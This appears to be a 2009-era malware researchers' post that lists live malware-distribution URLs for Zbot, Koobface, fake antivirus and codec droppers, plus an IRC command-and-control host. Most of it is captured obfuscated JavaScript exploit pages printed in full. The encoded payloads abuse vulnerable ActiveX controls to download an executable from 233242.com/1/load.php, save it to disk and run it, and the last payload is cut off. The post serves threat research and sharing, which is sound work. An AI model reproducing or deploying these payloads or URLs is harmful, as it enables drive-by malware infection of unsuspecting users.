http://tri-visionhomes.com/im/podmena.exe
http://tri-visionhomes.com/im/adv.exe
http://tri-visionhomes.com/im/s.exe
http://keepongoing.info/172.exe
http://keepongoing.info/secure.exe
http://211.95.78.66/ruzs/readme.txt
http://91.212.65.12/o9s833f/uerty/setup.exe
http://91.212.65.12/o9s833f/uerty/upd_beta.exe
http://195.88.80.150/myfiles/123/v302/file.exe
http://193.138.173.160/myfiles/100/v300/file.exe
http://193.138.173.160/myfiles/123/v302/file.exe
http://77.221.153.174/.c/o/rdr.exe
http://basesrv.net/base/kernel32.exe
http://91.207.61.180/images/138/v3/file.exe
http://aksajans.com/gif/nfr.exe
http://aksajans.com/gif/pp.03.exe
http://211.95.78.66/log/ldr.txt
http://powelldirects.com/stat/main.exe
http://zyujgss.com/zos/ue.exe
http://incredible.kiev.ua/suez/ldr.exe
I think many are gone bye-bye now. :-\
-
Zbot:
http://ctuf.info/ldr.exe
http://ctuf.info/cfg.bin
http://zeus-logs.biz/ldr.exe
http://zeus-logs.biz/cfg.bin
-
paksusic.cn/nuc/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=54bef4b232fec015b149b37a0c11fb9a&t=1238703827&type=js
http://www.virustotal.com/analisis/5566b16433e8c935625315dd76f619bf
-
Exploit which leads to trojan on MDL already:
http://dnsmytruedns.com/nuc/spl/pdf.pdf
http://wepawet.iseclab.org/view.php?hash=a6ddc93d17f80b8200c9dffa41b5a3a0&t=1238704964&type=js
Other trojan there:
http://dnsmytruedns.com/nuc/exe.php
http://www.virustotal.com/analisis/20fbf18e0a83f244a8a9a9a68068db80
Redirect to exploits:
http://aaaimmigration.com/
http://wepawet.iseclab.org/view.php?hash=7cb8f06a3c45746da10f644b71027a98&t=1238706643&type=js
Exploits/trojan:
http://p0rn-movies.com/77/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=a2982470cd2fbee7be138128ef6e8d0d&t=1238707074&type=js
Trojan:
http://findwife.asia/unique/1.exe
http://www.virustotal.com/analisis/6eae1c969cc3e7aae2f7ae0982be3bef
Exploit/Trojan:
http://193.200.255.19/~timchenko/cms/index.php
http://wepawet.iseclab.org/view.php?hash=832a4879ab612a34ba0c854471d72747&t=1238714177&type=js
Redirect to fake Av:
http://kogerta.com/redirect/bucks.php
fake AV :
system-scan-1.biz
Exploit/trojan:
http://hostyapics.net/img/index.php
http://wepawet.iseclab.org/view.php?hash=9e754a227c062120b20e7864e1e4ed59&t=1238720525&type=js
-
Koobface
http://xviewworldmy1.com/download/1/1000/5
http://viewworldmy1.com/download/1/1000/5
-
exploits/trojan
www.homesy.net/zel/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=e5e78672b3f7a7e8c52cda045bd24bf1&t=1238782592&type=js
http://www.virustotal.com/analisis/445d8300ab224462d9a00448318abe1a
-
exploits/trojan
ispacemac.ru/1/in.php
http://wepawet.cs.ucsb.edu/view.php?hash=049acfef69985d06934cb5d5e5098311&t=1238827604&type=js
http://www.virustotal.com/analisis/13954a7dd49b63eca41859e756b0e0a5
exploits/trojan
2icqmag.ru/mix/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=f1fb4e76dc9849b5a935d5b0d7c65553&t=1238827889&type=js
http://www.virustotal.com/analisis/a766c088385f0b406438e4051e821731
-
Fake AVs
Those were reported by Steven as located at zlkon, but they have been moved to IP 64.191.12.38.
antispylinks.com
antispyme.com
antispywareup.com
antiviruscheckout.com
antivirusup.com
goldpcguard.com
pcsecuretools.com
Reported by Anthony
78.26.179.131
best-tube-home.com
78.26.179.137
files.ms-loads-av.com/exe/setup_1_2_1.exe
66.197.154.198
goscanside.com
scan6zoom.com
scan6safe.com
userscan6.com
litescan6.com
209.44.126.14
fastsecurityscan.com
thegreatsecurity.com
truescansecurity.com
topsoftscanner.com/download.php
topsoftscanner.com/install/ws.zip
213.163.65.10
iloveyourbrain.com/scan/
loyal-tube.com/codec.exe
loyaldown99.com/codec.exe
loyaltube09.com/codec.exe
rakompoporyadkunazaryadku.com/codec.exe
ruler-domains.com/codec.exe
setupdatdownload.com/codec.exe
tube-loyal.com/codec.exe
tubeloyal.com/codec.exe
tubeloyaln.com/codec.exe
billingpayment.netcodecs.tubeloyaln.com/codec.exe
lamer.tubeloyaln.com/codec.exe
videosz.tubeloyaln.com/codec.exe
wedare.tubeloyaln.com/codec.exe
velzevuladmin.com/codec.exe
winpcdown09.com/codec.exe
winpcdown99.com/codec.exe
xp-police-09.com/codec.exe
xp-police-2009.com/codec.exe
xp-police-antivirus.com/codec.exe
xp-police-av.com/codec.exe
xp-police-engine.com/codec.exe
xp-police.com/codec.exe
*.xp-police.com/codec.exe
92.38.0.41
wincodecupdate.com/codec.exe
94.76.213.227
antispywareproupdates.com/zsa360/winconfig.dll
78.46.216.233
onlinerobosphere.cn/zsa360/winconfig.dll
212.117.165.126
platinumsecurityupdate.com/zsa360/winconfig.dll
-
Worm Win32/Boupke / Kernelbot (MS08-067)
freegoogla.vicp.net/download/em_setup.exe
http://www.virustotal.com/analisis/b58be0446e889229f163a6364e6279b1
94.23.93.6/firefox.exe
http://www.virustotal.com/analisis/0ff709c880ddbb9c8aa71d67593a0921 2/40
AntiVir 7.9.0.138 2009.04.05 TR/Crypt.XPACK.Gen
McAfee-GW-Edition 6.7.6 2009.04.03 Win32.Malware.dam (suspicious)
http://www.threatexpert.com/report.aspx?md5=39ee3f7eb571d59250df79914a7e8dbb
94.23.93.6/IEXPLORE.exe
http://www.virustotal.com/analisis/ffab02c5126508421194fcf00c6d50d1 5/40
http://www.threatexpert.com/report.aspx?md5=825cd2850f2d0d60d142adb65b35f575
irc.C3llBl0ck.com Port 9595
C&C for the firefox.exe and IEXPLORE.exe above.
-
233242.com/1/include/spl.php?do=foxit
233242.com/1/index.php
233242.com/1/load.php
http://www.virustotal.com/analisis/94c84868ce8339d909b4b344275e1710
I believe it reports to
newsineurope.net/z/config.bin
newsineurope.net/z/s.php?1=smoked_000de8e6&i=test
newsineurope.net/z/s.php?2=smoked_000de8e6&n=0&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?2=smoked_000de8e6&n=1&v=16778770&i=test&s=0&sp=0&lcp=0&pr=0
newsineurope.net/z/s.php?3=smoked_000de8e6&id=1238936099
233242.com/1/
<style>.dsA86BSFIK_41K{display:none;}</style>
<b class="dsA86BSFIK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="dsA86BSFIK_41K" id="dsA86BSFIK_41K">13.10.118.97.114.32.75.95.52.49.75.65.113.112.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.118.97.114.32.75.95.52.49.75.66.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.37.52.49.68.37.52.70.68.66.37.50.101.83.116.114.101.97.37.54.68.34.41.59.32.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.65.113.112.39.41.59.13.10.118.97.114.32.75.95.52.49.75.67.113.112.32.61.32.117.110.101.115.99.97.112.101.40.34.109.115.120.109.108.50.46.88.37.52.68.76.72.37.53.52.84.80.34.41.59.13.10.75.95.52.49.75.65.113.112.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.115.105.100.58.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.113.112.32.61.32.48.59.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.44.34.34.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.33.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.69.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.66.113.112.41.59.13.10.75.95.52.49.75.68.113.112.32.61.32.49.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10.105.102.32.40.75.95.52.49.75.68.113.112.32.61.61.32.49.41.13.10.123.13.10.116.114.121.13.10.123.13.10.118.97.114.32.75.95.52.49.75.70.113.112.32.61.32.75.95.52.49.75.65.113.112.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.44.34.34.41.59.13.10.118.97.114
.32.75.95.52.49.75.75.113.112.32.61.32.48.120.55.70.70.70.70.70.70.69.59.13.10.118.97.114.32.75.95.52.49.75.71.113.112.32.61.32.110.101.119.32.65.99.116.105.118.101.88.79.98.106.101.99.116.40.75.95.52.49.75.67.113.112.41.59.13.10.75.95.52.49.75.71.113.112.46.111.112.101.110.40.34.71.69.84.34.44.34.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.34.44.102.97.108.115.101.41.59.32.13.10.75.95.52.49.75.71.113.112.46.115.101.110.100.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.69.113.112.46.111.112.101.110.40.41.59.32.13.10.75.95.52.49.75.69.113.112.46.87.114.105.116.101.40.75.95.52.49.75.71.113.112.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.72.113.112.32.61.32.34.67.58.92.92.78.84.68.69.84.69.67.84.46.69.88.69.34.59.13.10.75.95.52.49.75.69.113.112.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.72.113.112.44.50.41.59.32.13.10.75.95.52.49.75.69.113.112.46.99.108.111.115.101.40.41.59.13.10.75.95.52.49.75.70.113.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.75.95.52.49.75.72.113.112.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.125.13.10.125.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|*]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("dsA86BSFIK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.kUbS1mK_41K{display:none;}</style>
<b class="kUbS1mK_41K" id="K_41K1">@e!@@@v@!@a@l!@</b>
<script>window.onerror = return(true);</script>
<div class="kUbS1mK_41K" id="kUbS1mK_41K">75.95.52.49.75.97.110.114.40.41.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.97.110.114.40.41.32.123.13.10.118.97.114.32.75.95.52.49.75.98.110.114.32.61.32.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.39.111.98.106.101.99.116.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.105.100.39.44.39.75.95.52.49.75.98.110.114.39.41.59.13.10.75.95.52.49.75.98.110.114.46.115.101.116.65.116.116.114.105.98.117.116.101.40.39.99.108.97.115.115.105.100.39.44.39.99.108.39.43.39.115.105.39.43.34.100.58.66.68.34.43.34.57.54.67.53.34.43.39.53.54.45.54.53.65.51.45.49.39.43.34.49.68.48.45.57.56.34.43.39.51.65.45.48.48.39.43.34.67.48.52.34.43.39.70.67.50.39.43.34.57.69.34.43.39.51.54.39.41.59.13.10.116.114.121.32.123.13.10.118.97.114.32.75.95.52.49.75.67.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.109.115.39.43.34.120.109.34.43.39.108.50.39.43.34.46.34.43.39.88.77.39.43.34.76.72.34.43.39.84.39.43.39.84.80.39.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.68.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.104.101.108.34.43.34.108.46.65.112.34.43.34.112.108.34.43.34.105.99.97.116.105.34.43.34.111.110.34.44.39.39.41.59.13.10.118.97.114.32.75.95.52.49.75.69.110.114.32.61.32.75.95.52.49.75.98.110.114.46.67.114.101.97.116.101.79.98.106.101.99.116.40.39.97.100.39.43.39.111.100.39.43.34.98.46.34.43.39.115.116.39.43.34.114.101.34.43.39.97.109.39.44.39.39.41.59.13.10.116.114.121.32.123.32.75.95.52.49.75.69.110.114.46.116.121.112.101.32.61.32.49.59.13.10.75.95.52.49.75.67.110.114.46.111.112.101.110.40.39.71.39.43.34.69.34.43.39.84.39.44.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.44.102.97.108.115.101.41.59.13.10.75.95.52.49.75.67.110.114.46.115.101.110.100.40.41.59.32.75.95.52.49.75.69.110.114.46.111
.112.101.110.40.41.59.13.10.75.95.52.49.75.69.110.114.46.87.114.105.116.101.40.75.95.52.49.75.67.110.114.46.114.101.115.112.111.110.115.101.66.111.100.121.41.59.13.10.118.97.114.32.75.95.52.49.75.70.110.114.32.61.32.39.46.47.47.46.46.47.47.115.118.99.104.111.115.116.46.101.120.101.39.59.13.10.75.95.52.49.75.69.110.114.46.83.97.118.101.84.111.70.105.108.101.40.75.95.52.49.75.70.110.114.44.50.41.59.13.10.75.95.52.49.75.69.110.114.46.67.108.111.115.101.40.41.59.13.10.125.32.99.97.116.99.104.40.101.41.32.123.125.13.10.116.114.121.32.123.32.75.95.52.49.75.68.110.114.46.115.104.101.108.108.101.120.101.99.117.116.101.40.75.95.52.49.75.70.110.114.41.59.32.125.32.99.97.116.99.104.40.101.41.32.123.125.125.13.10.99.97.116.99.104.40.101.41.123.125.125</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|@]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("kUbS1mK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script>
<style>.IkZaQm6AojiWK_41K{display:none;}</style>
<b class="IkZaQm6AojiWK_41K" id="K_41K1">^e!^^^v^!^a^l!^</b>
<script>window.onerror = return(true);</script>
<div class="IkZaQm6AojiWK_41K" id="IkZaQm6AojiWK_41K">13.10.118.97.114.32.75.95.52.49.75.65.101.119.61.39.104.116.116.112.58.47.47.50.51.51.50.52.50.46.99.111.109.47.49.47.108.111.97.100.46.112.104.112.39.59.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.66.101.119.40.111.44.110.41.123.13.10.118.97.114.32.114.61.110.117.108.108.59.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.67.114.101.97.116.101.79.98.106.101.99.116.40.110.44.34.34.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.34.34.44.110.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.44.34.34.41.125.99.97.116.99.104.40.101.41.123.125.125.105.102.40.33.114.41.123.116.114.121.123.114.61.111.46.71.101.116.79.98.106.101.99.116.40.110.41.125.99.97.116.99.104.40.101.41.123.125.125.114.101.116.117.114.110.40.114.41.59.13.10.125.13.10.102.117.110.99.116.105.111.110.32.75.95.52.49.75.67.101.119.40.97.41.123.13.10.102.110.97.109.101.61.34.102.105.108.101.46.101.120.101.34.59.118.97.114.32.75.95.52.49.75.68.101.119.61.97.46.67.114.101.97.116.101.79.98.106.101.99.116.40.34.83.99.114.105.112.116.105.110.103.46.70.105.108.101.83.121.115.116.101.109.79.98.106.101.99.116.34.44.34.34.41.59.118.97.114.32.115.97.112.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.118.97.114.32.120.61.75.95.52.49.75.66.101.119.40.97.44.34.65.68.79.68.66.46.83.116.114.101.97.109.34.41.59.118.97.114.32.75.95.52.49.75.69.101.119.61.110.117.108.108.59.102.110.97.109.101.61.75.95.52.49.75.68.101.119.46.66.11
7.105.108.100.80.97.116.104.40.75.95.52.49.75.68.101.119.46.71.101.116.83.112.101.99.105.97.108.70.111.108.100.101.114.40.50.41.44.102.110.97.109.101.41.59.120.46.77.111.100.101.61.51.59.13.10.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.105.99.114.111.115.111.102.116.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.123.116.114.121.123.75.95.52.49.75.69.101.119.61.75.95.52.49.75.66.101.119.40.97.44.34.77.83.88.77.76.50.46.83.101.114.118.101.114.88.77.76.72.84.84.80.34.41.59.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.125.13.10.99.97.116.99.104.40.101.41.13.10.123.13.10.116.114.121.13.10.123.13.10.75.95.52.49.75.69.101.119.61.110.101.119.32.88.77.76.72.116.116.112.82.101.113.117.101.115.116.40.41.59.13.10.75.95.52.49.75.69.101.119.46.111.112.101.110.40.34.71.69.84.34.44.75.95.52.49.75.65.101.119.44.102.97.108.115.101.41.59.13.10.125.13.10.99.97.116.99.104.40.101.41.123.114.101.116.117.114.110.32.48.59.125.125.125.125.13.10.120.46.84.121.112.101.61.49.59.75.95.52.49.75.69.101.119.46.115.101.110.100.40.110.117.108.108.41.59.114.98.61.75.95.52.49.75.69.101.119.46.114.101.115.112.111.110.115.101.66.111.100.121.59.120.46.79.112.101.110.40.41.59.120.46.87.114.105.116.101.40.114.98.41.59.120.46.83.97.118.101.84.111.102.105.108.101.40.102.110.97.109.101.44.50.41.59.115.97.112.46.83.104.101.108.108.69.120.101.99.117.116.101.40.102.110.97.109.101.41.59.13.10.114.101.116.117.114.110.32.49.59.13.10.125.13.10.102.117.110.99.116.105.111.1
10.32.75.95.52.49.75.70.101.119.40.41.123.13.10.118.97.114.32.105.61.48.59.118.97.114.32.75.95.52.49.75.71.101.119.61.110.101.119.32.65.114.114.97.121.40.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.54.39.44.39.66.68.57.54.67.53.53.54.45.54.53.65.51.45.49.49.68.48.45.57.56.51.65.45.48.48.67.48.52.70.67.50.57.69.51.48.39.44.39.65.66.57.66.67.69.68.68.45.69.67.55.69.45.52.55.69.49.45.57.51.50.50.45.68.52.65.50.49.48.54.49.55.49.49.54.39.44.39.48.48.48.54.70.48.51.51.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.48.48.48.54.70.48.51.65.45.48.48.48.48.45.48.48.48.48.45.67.48.48.48.45.48.48.48.48.48.48.48.48.48.48.52.54.39.44.39.54.101.51.50.48.55.48.97.45.55.54.54.100.45.52.101.101.54.45.56.55.57.99.45.100.99.49.102.97.57.49.100.50.102.99.51.39.44.39.54.52.49.52.53.49.50.66.45.66.57.55.56.45.52.53.49.68.45.65.48.68.56.45.70.67.70.68.70.51.51.69.56.51.51.67.39.44.39.55.70.53.66.55.70.54.51.45.70.48.54.70.45.52.51.51.49.45.56.65.50.54.45.51.51.57.69.48.51.67.48.65.69.51.68.39.44.39.48.54.55.50.51.69.48.57.45.70.52.67.50.45.52.51.99.56.45.56.51.53.56.45.48.57.70.67.68.49.68.66.48.55.54.54.39.44.39.54.51.57.70.55.50.53.70.45.49.66.50.68.45.52.56.51.49.45.65.57.70.68.45.56.55.52.56.52.55.54.56.50.48.49.48.39.44.39.66.65.48.49.56.53.57.57.45.49.68.66.51.45.52.52.102.57.45.56.51.66.52.45.52.54.49.52.53.52.67.56.52.66.70.56.39.44.39.68.48.67.48.55.68.53.54.45.55.67.54.57.45.52.51.70.49.45.66.52.65.48.45.50.53.70.53.65.49.49.70.65.66.49.57.39.44.39.69.56.67.67.67.68.68.70.45.67.65.50.56.45.52.57.54.98.45.66.48.53.48.45.54.67.48.55.67.57.54.50.52.55.54.66.39.44.110.117.108.108.41.59.13.10.119.104.105.108.101.40.75.95.52.49.75.71.101.119.91.105.93.41.13.10.123.13.10.118.97.114.32.97.61.110.117.108.108.59.13.10.97.61.100.111.99.117.109.101.110.116.46.99.114.101.97.116.101.69.108.101.109.101.110.116.40.34.111.98.106.101.99.116.34.41.59.13.10.97.46.115.101.116.65.116.116.114.
105.98.117.116.101.40.34.99.108.97.115.115.105.100.34.44.34.99.108.115.105.100.58.34.43.75.95.52.49.75.71.101.119.91.105.93.41.59.13.10.105.102.40.97.41.123.116.114.121.123.118.97.114.32.98.61.75.95.52.49.75.66.101.119.40.97.44.34.83.104.101.108.108.46.65.112.112.108.105.99.97.116.105.111.110.34.41.59.13.10.105.102.40.98.41.123.105.102.40.75.95.52.49.75.67.101.119.40.97.41.41.114.101.116.117.114.110.32.49.59.125.125.99.97.116.99.104.40.101.41.123.125.125.13.10.105.43.43.59.13.10.125.13.10.125.13.10.105.102.40.75.95.52.49.75.70.101.119.40.41.41.32.115.117.99.99.101.115.115.61.49.59.13.10</div>
<script>
var K_41KC89Bwe2bv = document;
K_41KC89Bwe2bv = K_41KC89Bwe2bv.getElementById('K_41K1');
K_41KC89Bwe2bv = K_41KC89Bwe2bv.innerHTML;
var K_41Ktrash = "q!w!e!r!t!y!";
K_41KC89Bwe2bv = K_41KC89Bwe2bv.replace(/[!|^]/g, "");
K_41Ktrash = K_41Ktrash.replace(/[!]/g,"");
var K_41Kttt = eval(K_41KC89Bwe2bv);
var K_41KD81Bwe2b = document.getElementById("IkZaQm6AojiWK_41K");
K_41Ktrash = K_41Ktrash.replace(/[q]/g,"");
K_41KD81Bwe2b = K_41KD81Bwe2b.innerHTML;
K_41KD81Bwe2b = K_41KD81Bwe2b.replace(/[A-Za-z]/g,function (K_41KCK_41K2dbQ){ return String.fromCharCode((((K_41KCK_41K2dbQ = K_41KCK_41K2dbQ.charCodeAt(0)) & 223) - 52) % 26 + (K_41KCK_41K2dbQ & 32) + 65); }).split(".");
K_41Ktrash = K_41Ktrash.replace(/[w]/g,"");
var K_41KEW81Bwe2b = "!!!";
K_41KEW81Bwe2b = K_41KEW81Bwe2b.replace(/[!]/g,"");
for (var K_41KK_41K=0; K_41KK_41K<K_41KD81Bwe2b.length; K_41KK_41K++){ K_41KEW81Bwe2b += String.fromCharCode(K_41KD81Bwe2b[K_41KK_41K]); }
K_41Kttt(K_41KEW81Bwe2b);
</script><script>
<style>.QIgskwBJjInK_41K{display:none;}</style>
<b class="QIgskwBJjInK_41K" id="K_41K1">*e!***v*!*a*l!*</b>
<script>window.onerror = return(true);</script>
<div class="QIgskwBJjInK_41K" id="QIgskwBJjInK_41K">100.111.99.117.109.101.110.116.46.119.114.105.116.101.40.117.110.101.115.99.97.112.101.40.34.37.51.67.115.99.114.105.112.116.37.50.48.108.97.110.103.117.97.103.101.37.51.68.37.50.50.118.98.115.99.114.105.112.116.37.50.50.37.51.69.37.48.68.37.48.65.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.77.111.100.101.82.101.97.100.87.114.105.116.101.37.51.68.51.37.48.68.37.48.65.67.111.110.115.116.37.50.48.97.100.84.121.112.101.66.105.110.97.114.121.37.51.68.49.37.48.68.37.48.65.67.111.110.115.116.37.48.68.37.48.65.97.100.83.97.118.101.67.114.101.97.116.101.79.118.101.114.87.114.105.116.101.37.51.68.50.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.70.83.79.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.83.116.114.101.97.109.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.111.87.83.104.101.108.108.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.80.108.117.103.105.110.70.105.108.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.99.66.121.116.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.78.97.109.101.37.48.68.37.48.65.68.105.109.37.50.48.37.50.48.37.50.48.79.98.106.80.114.111.103.37.48.68.37.48.65.79.98.106.78.97.109.101.37.51.68.37.50.50.65.68.79.68.66.37.50.50.37.48.68.37.48.65.79.98.106.80.114.111.103.37.51.68.37.50.50.83.116.114.101.97.109.37.50.50.37.48.68.37.48.65.79.110.37.50.48.69.114.114.111.114.37.50.48.82.101.115.117.109.101.37.50.48.78.101.120.116.37.48.68.37.48.65.83.101.116.37.50.48.111.83.116.114.101.97.109.37.51.68.119.105.110.100.111.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.79.98.106.78.97.109.101.37.50.48.37.50.54.37.50.48.37.50.50.46.37.50.50.37.50.48.37.50.54.37.50.48.79.98.106.80.114.111.103.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.73.102.37.50.48.69.114.114.46.110.117.109.98.101.114.37.50.48.37.51.67.37.51.69.37.50.48.48.37.50.48.84.104.101.110.37.48.68.37.48.65.83.101.116.37.50.48.111.70.83.79.37.51.68.119.105.110.100.1
11.119.46.111.82.68.83.46.67.114.101.97.116.101.79.98.106.101.99.116.37.50.56.37.50.50.83.99.114.105.112.116.105.110.103.46.70.105.37.50.50.37.50.48.37.50.54.37.50.48.37.50.50.108.101.83.121.115.116.101.109.79.98.106.101.99.116.37.50.50.37.50.67.37.50.50.37.50.50.37.50.57.37.48.68.37.48.65.83.101.116.37.50.48.80.108.117.103.105.110.70.105.108.101.37.51.68.111.70.83.79.46.67.114.101.97.116.101.84.101.120.116.70.105.108.101.37.50.56.119.105.110.100.111.119.46.101.120.101.78.97.109.101.37.50.67.37.48.68.37.48.65.84.82.85.69.37.50.57.37.48.68.37.48.65.80.108.117.103.105.110.95.115.105.122.101.37.51.68.76.101.110.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.57.37.48.68.37.48.65.37.48.68.37.48.65.70.111.114.37.50.48.106.37.51.68.49.37.50.48.84.111.37.50.48.80.108.117.103.105.110.95.115.105.122.101.37.48.68.37.48.65.37.50.48.37.50.48.99.66.121.116.101.37.51.68.77.105.100.66.37.50.56.119.105.110.100.111.119.46.88.77.76.66.111.100.121.37.50.67.106.37.50.67.49.37.50.57.37.48.68.37.48.65.37.50.48.37.50.48.66.121.1